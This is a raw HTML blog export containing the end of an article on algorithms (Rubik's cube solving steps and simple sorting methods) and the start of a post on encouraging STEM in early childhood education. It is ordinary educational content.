white-space: pre;">Step 4: Yellow Cross</span></h4><ol style="margin-bottom: 0px; margin-top: 0px;"><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 20pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Apply the following turns, until a yellow cross on the face appears with the yellow <br />center: F, R, U, R’, U’, F’.</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">If there is an “L” shape, where the two yellow pieces showing are adjacent to each <br />other, apply the following turns: F, U, R, U’, R’, F’.</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 20pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">If there is a “Line” shape, which is horizontal, apply the following turns: F, R, U, R’, U’, F’.</span></p></li></ol><h4 dir="ltr" style="line-height: 1.2; margin-bottom: 2pt; margin-top: 12pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Step 5: Sune and Antisune</span></h4><ol style="margin-bottom: 0px; margin-top: 0px;"><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 20pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Look at the face with the yellow center.</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Depending on the below contingencies, apply one of the following series of turns:</span></p></li><ol style="margin-bottom: 0px; margin-top: 0px;"><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">If there is only one oriented corner: R, U, R’, U, R, U2, R’ (repeat until the desired <br />position is attained)</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 20pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">There is one oriented corner and one right-facing corner: U2, R, U2, R’, U’, R, U’, R’</span></p></li></ol></ol><h4 dir="ltr" style="line-height: 1.2; margin-bottom: 2pt; margin-top: 12pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Step 6: Finishing the puzzle</span></h4><ol style="margin-bottom: 0px; margin-top: 0px;"><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 20pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Look for sets of “headlights” (two stickers of the same color in the same row, <br />separated by a sticker of a different color).</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Depending on how many there are, apply one of the following series of turns:</span></p></li><ol style="margin-bottom: 0px; margin-top: 0px;"><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">If there are a set of headlights on each side: R, U’, R, U, R, U, R, U’, R’, U’, R2</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 20pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Otherwise: R’, F, R’, B2, R, F’, R’, B2, R2</span></p></li></ol></ol><h3 dir="ltr" style="line-height: 1.2; margin-bottom: 4pt; margin-top: 14pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Sorting Algorithms</span></h3><p dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">A sorting algorithm is an algorithm that puts elements of a list in a certain order, usually in<br /> numerical or lexicographical order. Sorting is often an important first step in algorithms<br /> that solves more complex problems. There are a large number of sorting algorithms, <br />each with their own benefits and costs. Below, we will focus on some of the more famous <br />sorting algorithms.</span></p><ol style="margin-bottom: 0px; margin-top: 0px;"><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 20pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Linear sort: Find the smallest element in the list to be sorted, add it to a new list, <br />and remove it from the original list. Repeat this until the original list is empty.</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Bubble sort: Compare the first two elements in the list, and if the first is greater <br />than the second, swap them. Repeat this with every pair of adjacent elements <br />in the list. Then, repeat this process until the list is fully sorted.</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 20pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Insertion sort: Compare each element in the list to all the prior elements until <br />a smaller element is found. Swap these two elements. Repeat this process <br />until the list is fully sorted.</span></p></li></ol><h2 dir="ltr" style="line-height: 1.2; margin-bottom: 4pt; margin-top: 18pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Where Algorithms are Used in Computer Science?</span></h2><p dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Algorithms are used in every part of computer science. They form the field's backbone.<br />In computer science, an algorithm gives the computer a specific set of instructions, which <br />allows the computer to do everything, be it running a calculator or running a rocket. Computer <br />programs are, at their core, algorithms written in programming languages that the computer <br />can understand. Computer algorithms play a big role in how social media works: which posts<br /> show up, which ads are seen, and so on. These decisions are all made by algorithms. <br />Google’s programmers use algorithms to optimize searches, predict what users are going<br /> to type, and more. In problem-solving, a big part of computer programming is knowing<br /> how to formulate an algorithm.</span></p><h2 dir="ltr" style="line-height: 1.2; margin-bottom: 4pt; margin-top: 18pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Why are Algorithms Important to Understand?</span></h2><p dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Algorithmic thinking, or the ability to define clear steps to solve a problem, is crucial in <br />many different fields. Even if we’re not conscious of it, we use algorithms and algorithmic<br /> thinking all the time. Algorithmic thinking allows students to break down problems and<br /> conceptualize solutions in terms of discrete steps. Being able to understand and <br />implement an algorithm requires students to practice structured thinking and reasoning abilities.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 12pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">This </span><a href="https://junilearning.com/blog/guide/what-are-algorithms/" style="text-decoration: none;"><span style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 12pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">article</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 12pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> originally appeared on </span><a href="https://junilearning.com/" style="text-decoration: none;"><span style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 12pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">junilearning.com</span></a></p>Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-7171379281281950124.post-6353186172978101392020-07-13T22:44:00.000-07:002020-07-13T22:49:27.728-07:00How to Encourage STEM in Early Education<div dir="ltr" style="text-align: left;" trbidi="on">
<br id="docs-internal-guid-cb7e91ca-7fff-1078-0720-1715c0142ad3" />
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 445px; overflow: hidden; width: 624px;"><img height="445" src="https://lh3.googleusercontent.com/iV2ZLlLtkLbimkOQnXRNhd_z_q7F6NjKGYLe1SBlZYozk92TCNNq-xxouBNhn49-z2lJiFUs6Wq0GTyH3tdxpsmQYsLKDgzAXkMn1jI6czURfmj5xjt60USIXTbNjQXHPjTNGpuq" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<h2 dir="ltr" style="line-height: 1.2; margin-bottom: 4pt; margin-top: 18pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">What is STEM?</span></h2>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Science, technology, engineering, and mathematics (STEM) are largely used to influence innovative</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">solutions to our world’s problems. Day-to-day decisions are increasingly being driven by data, with</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span><br />
<a href="https://ssec.si.edu/stem-imperative" style="text-decoration: none;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">90% of the world’s data generated just in the last two years</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">. The proliferation of global access to mobile</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">technology, the internet, and other innovations indicates that future generations should be STEM-literate.</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Demand for STEM jobs has increased so much that </span><a href="https://ssec.si.edu/stem-imperative" style="text-decoration: none;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">2.4 million STEM-related jobs in the United States</span></a><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">were expected to go unfilled in 2018</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Encouraging early STEM education for young children today will not only help develop interdisciplinary critical</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">thinking now, it will also help set your child up with the critical, relevant skills that research says will be integral </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">for your child’s future success.</span></div>
<h2 dir="ltr" style="line-height: 1.2; margin-bottom: 4pt; margin-top: 18pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Why STEM Education is Vital for Kids</span></h2>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">STEM education is not just for college-level or even high school students. The </span><a href="https://www2.ed.gov/parents/academic/help/science/part_pg7.html#p7" style="text-decoration: none;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">U.S. Department of Education</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">links a strong formative math education with future success in areas outside of just math, predominantly reading. </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Early development is critical for future growth. Researchers report that </span><a href="http://web.jhu.edu/CSOS/early_learning/index.html" style="text-decoration: none;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">the brain forms the most active </span></a><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">connections during childhood</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">. Nourishing a child’s inquisitive mind with new information supports active </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">neural pathways at the most critical time of development. Constructing this foundation sets children up for </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">future cognitive and socio-economic gains.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">STEM programs and lesson plans exceed a science education. Not only does STEM education teach hard </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">skills, it also fosters life skills, such as creative problem solving, logic, and resilience. STEM literacy empowers</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> individuals with skills that serve them in STEM and non-STEM fields, alike. The ability to evolve as technology</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> evolves and grows prepares people for success in all endeavors.</span></div>
<h2 dir="ltr" style="line-height: 1.2; margin-bottom: 4pt; margin-top: 18pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Future STEM Career Pathways</span></h2>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;">
<a href="https://www.bls.gov/spotlight/2017/science-technology-engineering-and-mathematics-stem-occupations-past-present-and-future/home.htm" style="text-decoration: none;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">STEM occupations</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> grow faster than most other professions, command higher wages, and are required in</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> non-STEM fields. Some examples of STEM careers include software developers, statisticians, and </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">biomedical engineers. For further detailed information on STEM occupations, the Bureau of Labor Statistics </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">provides a </span><a href="https://www.bls.gov/k12/content/students/careers/stem-table.htm" style="text-decoration: none;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">“periodic table”</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> with details on entry to each field, career pathways, wages, and more.</span></div>
<h2 dir="ltr" style="line-height: 1.2; margin-bottom: 4pt; margin-top: 18pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Non-STEM Careers in a Tech-Oriented World</span></h2>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">STEM increasingly integrates with non-STEM subjects, such as economics, finance, and linguistics. </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Higher education programs support STEM education for the professional development of people seeking </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">non-STEM degrees.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Yale’s Department of Economics cites the “quantitative and analytic nature” of their program as the</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">reason for changing economics’ designation from a social science major to a STEM major. Yale isn’t the</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">only university readjusting their outlook; </span><a href="https://www.investopedia.com/news/why-colleges-want-economics-be-stem-major/" style="text-decoration: none;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Princeton, MIT, Columbia, and other universities have also</span></a><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">reclassified economics as STEM</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.</span></div>
<h2 dir="ltr" style="line-height: 1.2; margin-bottom: 4pt; margin-top: 18pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Diversity: STEM is for Everybody</span></h2>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Society traditionally regards STEM fields as masculine. The </span><a href="https://www.nsf.gov/news/news_summ.jsp?cntn_id=190924" style="text-decoration: none;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">National Science Foundation</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> reports that</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">only 30% of women are employed as scientists and engineers in the United States' STEM workforce.</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">However, though a great understatment, it was largely girls and women who have influenced the world</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">for what it is today.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Ada Lovelace is considered the first computer programmer, dating back to 1815. Katherine Johnson,</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">featured in Hidden Figures, was so exceedingly good at math that her job at NASA was quite literally to</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">check the work of computers. Of course, there are many others who have gone unrecognized.</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">A welcoming learning environment and strong STEM curriculum </span><a href="https://junilearning.com/blog/empowering-girls-in-computer-science" style="text-decoration: none;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">empowers girls to pursue STEM fields</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">,</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">including computer science.</span></div>
<h2 dir="ltr" style="line-height: 1.2; margin-bottom: 4pt; margin-top: 18pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">How Can Parents and Teachers Encourage STEM?</span></h2>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;">
